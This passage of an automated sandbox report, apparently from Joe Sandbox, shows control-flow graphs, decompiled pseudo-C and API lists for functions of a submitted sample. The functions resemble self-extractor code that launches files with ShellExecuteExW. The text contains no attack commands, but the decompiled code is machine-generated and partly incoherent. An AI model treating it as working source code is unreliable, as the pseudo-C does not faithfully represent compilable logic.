                                                        0x00a1cecf
                                                        0x00a1ced7
                                                        0x00a1ced7
                                                        0x00a1cee7
                                                        0x00a1cef5
                                                        0x00a1cf04
                                                        0x00a1cf0c
                                                        0x00a1cf1a
                                                        0x00a1cf2b
                                                        0x00a1cf2b
                                                        0x00a1cf47

                                                        APIs
                                                          • Part of subcall function 00A1AF04: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A1AF15
                                                          • Part of subcall function 00A1AF04: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A1AF26
                                                          • Part of subcall function 00A1AF04: IsDialogMessageW.USER32(0001039A,?), ref: 00A1AF3A
                                                          • Part of subcall function 00A1AF04: TranslateMessage.USER32(?), ref: 00A1AF48
                                                          • Part of subcall function 00A1AF04: DispatchMessageW.USER32(?), ref: 00A1AF52
                                                        • GetDlgItem.USER32(00000068,00A5ECB0), ref: 00A1CE32
                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00A1A8C2,00000001,?,?,00A1B15B,00A34F88,00A5ECB0,00A5ECB0,00001000,00000000,00000000), ref: 00A1CE5A
                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00A1CE65
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00A335B4), ref: 00A1CE73
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CE89
                                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00A1CEA3
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CEE7
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00A1CEF5
                                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00A1CF04
                                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00A1CF2B
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00A3431C), ref: 00A1CF3A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                        • String ID: \
                                                        • API String ID: 3569833718-2967466578
                                                        • Opcode ID: e8e738cb71b29b9a705dfe72a5c32e86ef11db950a530015f40eb7de21a19979
                                                        • Instruction ID: 43ab237a3d8f19a87240e05fd32eebfa0c065e21ec49d49556ca5e6f5207b16d
                                                        • Opcode Fuzzy Hash: e8e738cb71b29b9a705dfe72a5c32e86ef11db950a530015f40eb7de21a19979
                                                        • Instruction Fuzzy Hash: 7931CF75189B40BFE301DF60AC49FAF3FACFB97714F000608F65196191CBA959068BA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1D0DF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 837 a1d0df-a1d0f7 call a1e630 840 a1d348-a1d350 837->840 841 a1d0fd-a1d109 call a23883 837->841 841->840 844 a1d10f-a1d137 call a1f5f0 841->844 847 a1d141-a1d14e 844->847 848 a1d139 844->848 849 a1d150 847->849 850 a1d152-a1d15b 847->850 848->847 849->850 851 a1d193 850->851 852 a1d15d-a1d15f 850->852 853 a1d197-a1d19a 851->853 854 a1d167-a1d16a 852->854 855 a1d1a1-a1d1a3 853->855 856 a1d19c-a1d19f 853->856 857 a1d170-a1d178 854->857 858 a1d2f9-a1d2fe 854->858 859 a1d1b6-a1d1cb call a0b683 855->859 860 a1d1a5-a1d1ac 855->860 856->855 856->859 861 a1d312-a1d31a 857->861 862 a1d17e-a1d184 857->862 863 a1d300 858->863 864 a1d2f3-a1d2f7 858->864 872 a1d1e4-a1d1ef call a0a373 859->872 873 a1d1cd-a1d1da call a11ac4 859->873 860->859 865 a1d1ae 860->865 866 a1d322-a1d32a 861->866 867 a1d31c-a1d31e 861->867 862->861 869 a1d18a-a1d191 862->869 870 a1d305-a1d309 863->870 864->858 864->870 865->859 866->853 867->866 869->851 869->854 870->861 879 a1d1f1-a1d208 call a0b429 872->879 880 a1d20c-a1d219 ShellExecuteExW 872->880 873->872 878 a1d1dc 873->878 878->872 879->880 882 a1d347 880->882 883 a1d21f-a1d22c 880->883 882->840 885 a1d23f-a1d241 883->885 886 a1d22e-a1d235 883->886 888 a1d243-a1d24c 885->888 889 a1d258-a1d277 call a1d5a3 885->889 886->885 887 a1d237-a1d23d 886->887 887->885 890 a1d2ae-a1d2ba CloseHandle 887->890 888->889 898 a1d24e-a1d256 ShowWindow 888->898 889->890 904 a1d279-a1d281 889->904 891 a1d2cb-a1d2d9 890->891 892 a1d2bc-a1d2c9 call a11ac4 890->892 896 a1d336-a1d338 891->896 897 a1d2db-a1d2dd 891->897 892->891 905 a1d32f 892->905 896->882 901 a1d33a-a1d33c 896->901 897->896 902 a1d2df-a1d2e5 897->902 898->889 901->882 906 a1d33e-a1d341 ShowWindow 901->906 902->896 907 a1d2e7-a1d2f1 902->907 904->890 908 a1d283-a1d294 GetExitCodeProcess 904->908 905->896 906->882 907->896 908->890 909 a1d296-a1d2a0 908->909 910 a1d2a2 909->910 911 a1d2a7 909->911 910->911 911->890
                                                        C-Code - Quality: 76%
                                                        			E00A1D0DF(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t55;
				signed int _t58;
				signed short* _t59;
				long _t70;
				int _t79;
				intOrPtr _t82;
				signed int _t83;
				signed short* _t84;
				signed short _t85;
				long _t88;
				signed short* _t89;
				void* _t90;
				signed short* _t93;
				struct HWND__* _t95;
				void* _t96;
				void* _t97;
				void* _t100;

				_t96 = __ebp;
				_t55 = 0x1040;
				E00A1E630();
				_t93 = _a4168;
				_t79 = 0;
				if( *_t93 == 0) {
					L55:
					return _t55;
				}
				_t55 = E00A23883(_t93);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t88 = 0x3c;
					E00A1F5F0(_t88,  &_a4, 0, _t88);
					_t82 = _a4176;
					_t100 = _t100 + 0xc;
					_a4.cbSize = _t88;
					_a8 = 0x1c0;
					if(_t82 != 0) {
						_a8 = 0x5c0;
					}
					_t83 =  *_t93 & 0x0000ffff;
					_t89 =  &(_t93[1]);
					_push(_t96);
					_t97 = 0x22;
					if(_t83 != _t97) {
						_t89 = _t93;
					}
					_a20 = _t89;
					_t58 = _t79;
					if(_t83 == 0) {
						L13:
						_t59 = _a24;
						L14:
						if(_t59 == 0 ||  *_t59 == _t79) {
							if(_t82 == 0 &&  *0xa4b472 != _t79) {
								_a24 = 0xa4b472;
							}
						}
						_a32 = _a4172;
						_t90 = E00A0B683(_t89);
						if(_t90 != 0 && E00A11AC4(_t90, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E00A0A373(_a20) != 0) {
							E00A0B429(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t55 = ShellExecuteExW( &_a4); // executed
						if(_t55 != 0) {
							_t95 = _a4160;
							if( *0xa49468 != _t79 || _a4172 != _t79 ||  *0xa5ec99 != _t79) {
								if(_t95 != 0) {
									_push(_t95);
									if( *0xa620b0() != 0) {
										ShowWindow(_t95, _t79);
										_t79 = 1;
									}
								}
								 *0xa620ac(_a56, 0x7d0);
								E00A1D5A3(_a48);
								if( *0xa5ec99 != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t70 = _v12;
									if(_t70 >  *0xa5ec9c) {
										 *0xa5ec9c = _t70;
									}
									 *0xa5ec9a = 1;
								}
							}
							CloseHandle(_a48);
							if(_t90 == 0 || E00A11AC4(_t90, L".exe") != 0) {
								_t55 = _a4164;
								if( *0xa49468 != 0 && _t55 == 0 &&  *0xa5ec99 == _t55) {
									 *0xa5eca0 = 0x1b58;
								}
							} else {
								_t55 = _a4164;
							}
							if(_t79 != 0 && _t55 != 0) {
								_t55 = ShowWindow(_t95, 1);
							}
						}
						goto L55;
					}
					_t84 = _t93;
					_v0 = 0x20;
					do {
						if( *_t84 == _t97) {
							while(1) {
								_t58 = _t58 + 1;
								if(_t93[_t58] == _t79) {
									break;
								}
								if(_t93[_t58] == _t97) {
									_t85 = _v0;
									_t93[_t58] = _t85;
									L10:
									if(_t93[_t58] == _t85 ||  *((short*)(_t93 + 2 + _t58 * 2)) == 0x2f) {
										if(_t93[_t58] == _v0) {
											_t93[_t58] = 0;
										}
										_t59 =  &(_t93[_t58 + 1]);
										_a24 = _t59;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t85 = _v0;
						goto L10;
						L12:
						_t58 = _t58 + 1;
						_t84 =  &(_t93[_t58]);
					} while ( *_t84 != _t79);
					goto L13;
				}
			}























                                                        0x00a1d0df
                                                        0x00a1d0df
                                                        0x00a1d0e4
                                                        0x00a1d0eb
                                                        0x00a1d0f2
                                                        0x00a1d0f7
                                                        0x00a1d348
                                                        0x00a1d350
                                                        0x00a1d350
                                                        0x00a1d0fe
                                                        0x00a1d109
                                                        0x00000000
                                                        0x00a1d10f
                                                        0x00a1d112
                                                        0x00a1d11a
                                                        0x00a1d11f
                                                        0x00a1d126
                                                        0x00a1d129
                                                        0x00a1d12d
                                                        0x00a1d137
                                                        0x00a1d139
                                                        0x00a1d139
                                                        0x00a1d141
                                                        0x00a1d144
                                                        0x00a1d147
                                                        0x00a1d14a
                                                        0x00a1d14e
                                                        0x00a1d150
                                                        0x00a1d150
                                                        0x00a1d152
                                                        0x00a1d156
                                                        0x00a1d15b
                                                        0x00a1d193
                                                        0x00a1d193
                                                        0x00a1d197
                                                        0x00a1d19a
                                                        0x00a1d1a3
                                                        0x00a1d1ae
                                                        0x00a1d1ae
                                                        0x00a1d1a3
                                                        0x00a1d1be
                                                        0x00a1d1c7
                                                        0x00a1d1cb
                                                        0x00a1d1dc
                                                        0x00a1d1dc
                                                        0x00a1d1ef
                                                        0x00a1d1ff
                                                        0x00a1d208
                                                        0x00a1d208
                                                        0x00a1d211
                                                        0x00a1d219
                                                        0x00a1d21f
                                                        0x00a1d22c
                                                        0x00a1d241
                                                        0x00a1d243
                                                        0x00a1d24c
                                                        0x00a1d250
                                                        0x00a1d256
                                                        0x00a1d256
                                                        0x00a1d24c
                                                        0x00a1d261
                                                        0x00a1d26b
                                                        0x00a1d277
                                                        0x00a1d296
                                                        0x00a1d2a0
                                                        0x00a1d2a2
                                                        0x00a1d2a2
                                                        0x00a1d2a7
                                                        0x00a1d2a7
                                                        0x00a1d277
                                                        0x00a1d2b2
                                                        0x00a1d2ba
                                                        0x00a1d2d2
                                                        0x00a1d2d9
                                                        0x00a1d2e7
                                                        0x00a1d2e7
                                                        0x00a1d32f
                                                        0x00a1d32f
                                                        0x00a1d32f
                                                        0x00a1d338
                                                        0x00a1d341
                                                        0x00a1d341
                                                        0x00a1d338
                                                        0x00000000
                                                        0x00a1d347
                                                        0x00a1d15d
                                                        0x00a1d15f
                                                        0x00a1d167
                                                        0x00a1d16a
                                                        0x00a1d2f9
                                                        0x00a1d2f9
                                                        0x00a1d2fe
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1d2f7
                                                        0x00a1d305
                                                        0x00a1d309
                                                        0x00a1d174
                                                        0x00a1d178
                                                        0x00a1d31a
                                                        0x00a1d31e
                                                        0x00a1d31e
                                                        0x00a1d323
                                                        0x00a1d326
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a1d178
                                                        0x00a1d2f7
                                                        0x00a1d300
                                                        0x00a1d170
                                                        0x00000000
                                                        0x00a1d18a
                                                        0x00a1d18a
                                                        0x00a1d18b
                                                        0x00a1d18e
                                                        0x00000000
                                                        0x00a1d167

                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00A1D211
                                                        • ShowWindow.USER32(?,00000000), ref: 00A1D250
                                                        • GetExitCodeProcess.KERNEL32 ref: 00A1D28C
                                                        • CloseHandle.KERNEL32(?), ref: 00A1D2B2
                                                        • ShowWindow.USER32(?,00000001), ref: 00A1D341
                                                          • Part of subcall function 00A11AC4: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,00A0B250,?,?,?,00A0B1FE,?,-00000002,?,00000000,?), ref: 00A11ADA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                        • String ID: $.exe$.inf
                                                        • API String ID: 3686203788-2452507128
                                                        • Opcode ID: efd7a600008cf28c1bee65b87de51506d6998bdade85b49df907dd9eceea52fb
                                                        • Instruction ID: 9fb4ad365da36c47932d032344c3edfb6df941781b82bee1d5aca48fc623f334
                                                        • Opcode Fuzzy Hash: efd7a600008cf28c1bee65b87de51506d6998bdade85b49df907dd9eceea52fb
                                                        • Instruction Fuzzy Hash: CD6100B0504380AADB31DF64D904AEBBBF9AF82304F084919F5D08B1A1E7B5C9C5CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2A368 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 912 a2a368-a2a381 913 a2a383-a2a393 call a2e9bc 912->913 914 a2a397-a2a39c 912->914 913->914 922 a2a395 913->922 916 a2a3a9-a2a3cd MultiByteToWideChar 914->916 917 a2a39e-a2a3a6 914->917 919 a2a3d3-a2a3df 916->919 920 a2a560-a2a573 call a1eefa 916->920 917->916 923 a2a433 919->923 924 a2a3e1-a2a3f2 919->924 922->914 928 a2a435-a2a437 923->928 925 a2a411-a2a422 call a28838 924->925 926 a2a3f4-a2a403 call a31d00 924->926 931 a2a555 925->931 938 a2a428 925->938 926->931 937 a2a409-a2a40f 926->937 928->931 932 a2a43d-a2a450 MultiByteToWideChar 928->932 936 a2a557-a2a55e call a2a5d0 931->936 932->931 935 a2a456-a2a468 call a2aa3c 932->935 942 a2a46d-a2a471 935->942 936->920 941 a2a42e-a2a431 937->941 938->941 941->928 942->931 944 a2a477-a2a47e 942->944 945 a2a480-a2a485 944->945 946 a2a4b8-a2a4c4 944->946 945->936 947 a2a48b-a2a48d 945->947 948 a2a510 946->948 949 a2a4c6-a2a4d7 946->949 947->931 950 a2a493-a2a4ad call a2aa3c 947->950 951 a2a512-a2a514 948->951 952 a2a4f2-a2a503 call a28838 949->952 953 a2a4d9-a2a4e8 call a31d00 949->953 950->936 964 a2a4b3 950->964 955 a2a516-a2a52f call a2aa3c 951->955 956 a2a54e-a2a554 call a2a5d0 951->956 952->956 968 a2a505 952->968 953->956 967 a2a4ea-a2a4f0 953->967 955->956 970 a2a531-a2a538 955->970 956->931 964->931 969 a2a50b-a2a50e 967->969 968->969 969->951 971 a2a574-a2a57a 970->971 972 a2a53a-a2a53b 970->972 973 a2a53c-a2a54c WideCharToMultiByte 971->973 972->973 973->956 974 a2a57c-a2a583 call a2a5d0 973->974 974->936
                                                        C-Code - Quality: 69%
                                                        			E00A2A368(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0xa3e668; // 0xcba178b4
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E00A2E9BC(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00A1EEFA(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E00A2A5D0(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E00A2AA3C(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E00A2A5D0(_t101);
									goto L36;
								}
								_t62 = E00A2AA3C(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E00A2A5D0(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00A28838(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00A31D00();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E00A2AA3C(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00A28838(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00A31D00();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}


























                                                        0x00a2a36d
                                                        0x00a2a36e
                                                        0x00a2a36f
                                                        0x00a2a376
                                                        0x00a2a37a
                                                        0x00a2a37b
                                                        0x00a2a381
                                                        0x00a2a387
                                                        0x00a2a38d
                                                        0x00a2a390
                                                        0x00a2a390
                                                        0x00a2a393
                                                        0x00a2a395
                                                        0x00a2a395
                                                        0x00a2a393
                                                        0x00a2a397
                                                        0x00a2a39c
                                                        0x00a2a3a3
                                                        0x00a2a3a6
                                                        0x00a2a3a6
                                                        0x00a2a3c2
                                                        0x00a2a3c8
                                                        0x00a2a3cd
                                                        0x00a2a560
                                                        0x00a2a573
                                                        0x00a2a3d3
                                                        0x00a2a3d3
                                                        0x00a2a3d6
                                                        0x00a2a3db
                                                        0x00a2a3df
                                                        0x00a2a433
                                                        0x00a2a433
                                                        0x00a2a435
                                                        0x00a2a437
                                                        0x00a2a555
                                                        0x00a2a555
                                                        0x00a2a557
                                                        0x00a2a558
                                                        0x00000000
                                                        0x00a2a55e
                                                        0x00a2a448
                                                        0x00a2a44e
                                                        0x00a2a450
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a456
                                                        0x00a2a468
                                                        0x00a2a46d
                                                        0x00a2a471
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a47e
                                                        0x00a2a4b8
                                                        0x00a2a4bb
                                                        0x00a2a4be
                                                        0x00a2a4c0
                                                        0x00a2a4c2
                                                        0x00a2a4c4
                                                        0x00a2a510
                                                        0x00a2a510
                                                        0x00a2a512
                                                        0x00a2a512
                                                        0x00a2a514
                                                        0x00a2a54e
                                                        0x00a2a54f
                                                        0x00000000
                                                        0x00a2a554
                                                        0x00a2a528
                                                        0x00a2a52d
                                                        0x00a2a52f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a533
                                                        0x00a2a534
                                                        0x00a2a535
                                                        0x00a2a538
                                                        0x00a2a574
                                                        0x00a2a577
                                                        0x00a2a53a
                                                        0x00a2a53a
                                                        0x00a2a53b
                                                        0x00a2a53b
                                                        0x00a2a548
                                                        0x00a2a54a
                                                        0x00a2a54c
                                                        0x00a2a57d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a54c
                                                        0x00a2a4c6
                                                        0x00a2a4c9
                                                        0x00a2a4cb
                                                        0x00a2a4cd
                                                        0x00a2a4cf
                                                        0x00a2a4d2
                                                        0x00a2a4d7
                                                        0x00a2a4f2
                                                        0x00a2a4f4
                                                        0x00a2a4fe
                                                        0x00a2a500
                                                        0x00a2a501
                                                        0x00a2a503
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a505
                                                        0x00a2a50b
                                                        0x00a2a50b
                                                        0x00000000
                                                        0x00a2a50b
                                                        0x00a2a4d9
                                                        0x00a2a4db
                                                        0x00a2a4df
                                                        0x00a2a4e4
                                                        0x00a2a4e6
                                                        0x00a2a4e8
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a4ea
                                                        0x00000000
                                                        0x00a2a4ea
                                                        0x00a2a480
                                                        0x00a2a485
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a48b
                                                        0x00a2a48d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a4a4
                                                        0x00a2a4a9
                                                        0x00a2a4ad
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a4b3
                                                        0x00a2a3e6
                                                        0x00a2a3e8
                                                        0x00a2a3ea
                                                        0x00a2a3f2
                                                        0x00a2a411
                                                        0x00a2a413
                                                        0x00a2a41d
                                                        0x00a2a41f
                                                        0x00a2a420
                                                        0x00a2a422
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a428
                                                        0x00a2a42e
                                                        0x00a2a42e
                                                        0x00000000
                                                        0x00a2a42e
                                                        0x00a2a3f6
                                                        0x00a2a3fa
                                                        0x00a2a3ff
                                                        0x00a2a403
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a409
                                                        0x00000000
                                                        0x00a2a409

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00A2526B,00A2526B,?,?,?,00A2A5B9,00000001,00000001,8FE85006), ref: 00A2A3C2
                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00A2A5B9,00000001,00000001,8FE85006,?,?,?), ref: 00A2A448
                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00A2A542
                                                        • __freea.LIBCMT ref: 00A2A54F
                                                          • Part of subcall function 00A28838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23CF6,?,0000015D,?,?,?,?,00A251D2,000000FF,00000000,?,?), ref: 00A2886A
                                                        • __freea.LIBCMT ref: 00A2A558
                                                        • __freea.LIBCMT ref: 00A2A57D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1414292761-0
                                                        • Opcode ID: 288a3bb418c0843d42de483744ecf5ba7cc8699484230c6146850d9ecb1d8adb
                                                        • Instruction ID: 5f0a9887e1abfdadc5138562dc2a2e02f3f07f4374dfc3293c8579e7d0f37b68
                                                        • Opcode Fuzzy Hash: 288a3bb418c0843d42de483744ecf5ba7cc8699484230c6146850d9ecb1d8adb
                                                        • Instruction Fuzzy Hash: E151CE72A10226AFDB259F68ED41EAF7BA9EF60750F154638FC05D6140EB34DC80C662
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A558 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 977 a1a558-a1a577 GetClassNameW 978 a1a579-a1a58e call a11ac4 977->978 979 a1a59f-a1a5a1 977->979 984 a1a590-a1a59c FindWindowExW 978->984 985 a1a59e 978->985 981 a1a5a3-a1a5a5 979->981 982 a1a5ac-a1a5b0 979->982 981->982 984->985 985->979
                                                        C-Code - Quality: 100%
                                                        			E00A1A558(long _a4) {
				short _v164;
				long _t5;
				long _t6;
				WCHAR* _t9;
				long _t11;

				_t11 = _a4;
				_t5 = GetClassNameW(_t11,  &_v164, 0x50);
				if(_t5 != 0) {
					_t9 = L"EDIT";
					_t5 = E00A11AC4( &_v164, _t9);
					if(_t5 != 0) {
						_t5 = FindWindowExW(_t11, 0, _t9, 0); // executed
						_t11 = _t5;
					}
				}
				if(_t11 != 0) {
					_t6 = SHAutoComplete(_t11, 0x10); // executed
					return _t6;
				}
				return _t5;
			}








                                                        0x00a1a568
                                                        0x00a1a56f
                                                        0x00a1a577
                                                        0x00a1a57a
                                                        0x00a1a587
                                                        0x00a1a58e
                                                        0x00a1a596
                                                        0x00a1a59c
                                                        0x00a1a59c
                                                        0x00a1a59e
                                                        0x00a1a5a1
                                                        0x00a1a5a6
                                                        0x00000000
                                                        0x00a1a5a6
                                                        0x00a1a5b0

                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000050), ref: 00A1A56F
